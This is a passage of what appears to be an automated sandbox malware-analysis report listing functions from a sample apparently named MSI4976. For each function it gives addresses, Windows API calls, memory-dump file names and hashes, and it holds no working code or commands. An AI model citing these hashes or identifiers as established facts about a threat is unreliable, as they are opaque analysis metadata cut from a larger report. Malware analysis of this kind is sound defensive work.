                                        • Opcode ID: 9c5844c22338b4b4d85b5ad043222265f0ee920a55dd8a07eebfd6b94a010315
                                        • Instruction ID: 48cc68b42e0ab39260ace3b8830c7a11b035dac2ccd4679f0fbc38551bcf6d25
                                        • Opcode Fuzzy Hash: 9c5844c22338b4b4d85b5ad043222265f0ee920a55dd8a07eebfd6b94a010315
                                        • Instruction Fuzzy Hash: 0CF08C712002249FD356EF69E405B9ABBE8AF5A320F00002AF81ACB651DB70B800CBD0
                                        Function 003281C6 Relevance: 1.9, APIs: 1, Instructions: 438COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                        • __wcsnicmp.LIBCMT ref: 003283C4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __itow__swprintf__wcsnicmp
                                        • String ID:
                                        • API String ID: 712828618-0
                                        • Opcode ID: 4774ebe45454ccd5e61ca601947f7bc710b3c6367f6404d2ed68767689bd55da
                                        • Instruction ID: ac5e6d59eb6c504d38d33410e6edccca0c58dfb09e8381cf4c94b2b63b38044d
                                        • Opcode Fuzzy Hash: 4774ebe45454ccd5e61ca601947f7bc710b3c6367f6404d2ed68767689bd55da
                                        • Instruction Fuzzy Hash: 4FF17C75508312AFC706EF19D89186FBBE5FF98314F54891DF9859B222DB30EA05CB82
                                        Function 00334040 Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                        • Instruction ID: 24c9b6a75bfdd0647a9f68585f5207dfec9109f6baf9fe334765e59228c1db1d
                                        • Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                        • Instruction Fuzzy Hash: FE61CFB5A046069FCB06DF64C8C1A7AF7E8FF19310F108269E9168B691E730FD91CB91
                                        Function 0033EF0D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dacab9b76aadc0bb8de758e35bfe58fcc1e70a9adc7a6c1960fd066bcf365582
                                        • Instruction ID: 618213dc94873bd5118b070f03fc20ff57ec2c2cfe3c7da2abadeb57d048f0af
                                        • Opcode Fuzzy Hash: dacab9b76aadc0bb8de758e35bfe58fcc1e70a9adc7a6c1960fd066bcf365582
                                        • Instruction Fuzzy Hash: 8D51A135700224AFCF06EF68D992EAD77AAAF49310F158169F9069F392DB30ED01DB50
                                        Function 0032B6D0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                        • Instruction ID: b33f8cabd20f88e283f01c3791cdc03a70133689827be67f3968da451d460f89
                                        • Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                        • Instruction Fuzzy Hash: 5741BFB9200612CFC725DF19E491922F7F4FF88360715C42EE99A8BB61D730E851CB50
                                        Function 00324EE9 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00324F8F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 271674ce134e77719932b1d44ad55efc384180e434e30ea5b1e5cb76ee676c1a
                                        • Instruction ID: 8ba72831b245780e81c96f22b5019dd31ca5282c0977875d81b51f51ba05e657
                                        • Opcode Fuzzy Hash: 271674ce134e77719932b1d44ad55efc384180e434e30ea5b1e5cb76ee676c1a
                                        • Instruction Fuzzy Hash: AB315E31A00625BFCB09CF6CE684AADB7B5BF88310F158629E81997714D770BD90CB90
                                        Function 0033F92C Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: select
                                        • String ID:
                                        • API String ID: 1274211008-0
                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction ID: e564a4544f8f5990036ce73e56b3c3f8b29db690ec04e370e3dba47496c3eb39
                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction Fuzzy Hash: F731E2B0A00106AFC70ADF58C4C0B69FBA6FB59310FA582A5E44ACB655DB30EDC1CB80
                                        Function 0039AA5A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: 67e2c0190d46fa8b776088bd1824dbc87bc405b747986fd432c745e1a32c3d36
                                        • Instruction ID: 9fddcd79edd422d17fba20443c0e34b1e3145b3606e90260cd69e4029c8d3ffd
                                        • Opcode Fuzzy Hash: 67e2c0190d46fa8b776088bd1824dbc87bc405b747986fd432c745e1a32c3d36
                                        • Instruction Fuzzy Hash: 93415D74504651CFDB2ACF18C494B1ABBE1BF45308F19856CE9964B762C331F885CF52
                                        Function 00324D67 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 47012782a030ad8779f94faa8e2b2c96d7a630cd2f65ef253b2984702ea6a323
                                        • Instruction ID: 78a54783d401eb884a19ab5f508c54080a28dd6d634b4aade02a0e7973c12f5c
                                        • Opcode Fuzzy Hash: 47012782a030ad8779f94faa8e2b2c96d7a630cd2f65ef253b2984702ea6a323
                                        • Instruction Fuzzy Hash: EB21E470A00608EBCF169F91FC81A6A7BFDFB56340F21856EE496D9011EB3095D1C755
                                        Function 0032D805 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                        • Instruction ID: 00aecfe1920d0a2d3ceb1effffc1634a672fda63520db865bb11216d5926afc9
                                        • Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                        • Instruction Fuzzy Hash: E1114976600601DFD725DF28E581916B7E9FF48320B20882EE98ACB661E732E841CB50
                                        Function 00323F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00323F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00323F90
                                          • Part of subcall function 00344129: __wfsopen.LIBCMT ref: 00344134
                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003234E2,?,00000001), ref: 00323FCD
                                          • Part of subcall function 00323E78: FreeLibrary.KERNEL32(00000000), ref: 00323EAB
                                          • Part of subcall function 00324010: _memmove.LIBCMT ref: 0032405A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Library$Free$Load__wfsopen_memmove
                                        • String ID:
                                        • API String ID: 1396898556-0
                                        • Opcode ID: 8f0ce1a05a114bda05ae50830160cc0f0015589df0fe2f95fca31c2559c5c4ea
                                        • Instruction ID: 2026cc2a165bc4157e614d6943dfccc9b5b923192ef648d6108dc66e1b18f8ca
                                        • Opcode Fuzzy Hash: 8f0ce1a05a114bda05ae50830160cc0f0015589df0fe2f95fca31c2559c5c4ea
                                        • Instruction Fuzzy Hash: 8411A332610225BACF12AF74FC03FAD76A99F50740F108829F542EF1C1DB74AE459B51
                                        Function 0039AB2A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: ecd812daf36ae1d3603359d2342f30ef4fbb764cb95cfe52b566ed02b85d4a99
                                        • Instruction ID: 9bda6df19634523b229e6530dcb1fbbb55e266dae41a7ebce74d00d4b051dc1d
                                        • Opcode Fuzzy Hash: ecd812daf36ae1d3603359d2342f30ef4fbb764cb95cfe52b566ed02b85d4a99
                                        • Instruction Fuzzy Hash: 49213974508601CFDB2ADF64C494B1ABBE1BF89304F15496CEA964B632C731E845CF52
                                        Function 003280EA Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 3e742b1ba0a0c987c836b15959b7f65b2bcde272eb65e0dd682e5ea94299c368
                                        • Instruction ID: af18919de84ae2fc8627a80a019dfcdc11d9d16a16c519fe34389ab4989245a7
                                        • Opcode Fuzzy Hash: 3e742b1ba0a0c987c836b15959b7f65b2bcde272eb65e0dd682e5ea94299c368
                                        • Instruction Fuzzy Hash: 38010C322066319FC711AF18E881D6BB39CEF44760B14422AF9558B2D1DF31BC218790
                                        Function 003810E5 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 8dc8f9b2be8937dbebeb1422f62ac98712d3ff571eaedbd04077ce2e6face332
                                        • Instruction ID: 25c815e6eb8d1377c3278ee6f7eb3f0d69230c772ad4245f15dc47604ea5f5a2
                                        • Opcode Fuzzy Hash: 8dc8f9b2be8937dbebeb1422f62ac98712d3ff571eaedbd04077ce2e6face332
                                        • Instruction Fuzzy Hash: 6A119E363012159FDB12EF18C884ADAB7E9FF49720F0581AAFD4A8F355CB30AD418B91
                                        Function 00324CA0 Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00324E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00324CF7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 059f42f99779fd8aa19a889310d51772c8ea6281bbf0a7b8ee28155d8fa6d7cf
                                        • Instruction ID: bb4ce3cbb89ec1dc39cf95043059fcc671d6c5ed35e7c29ac30f1f50d72a3b54
                                        • Opcode Fuzzy Hash: 059f42f99779fd8aa19a889310d51772c8ea6281bbf0a7b8ee28155d8fa6d7cf
                                        • Instruction Fuzzy Hash: FE117C31201B64AFD322CF0AD880F66B7E9EF44714F10C42DE59A86A50C771F844CB60
                                        Function 00324D29 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                        • Instruction ID: f9616d14445ae82212f807e8e6035aac5d815bbf0b80b9c6c1626cbde2efde16
                                        • Opcode Fuzzy Hash: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                        • Instruction Fuzzy Hash: E7018FB9200542AFC306EB28D981D39F7A9FF853107548259E429CB702CB30FC22CBE0
                                        Function 0032CAEE Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                        • Instruction ID: fca55dec7f7c04076d9458cee2104b2c2b7cdfebdd508cddbb2dac6932f1b856
                                        • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                        • Instruction Fuzzy Hash: 0901F9722147016ED7269B39D807A6ABBD8DF447A0F50852EF95ACF1D1EB71E4008A50
                                        Function 0033F2D0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
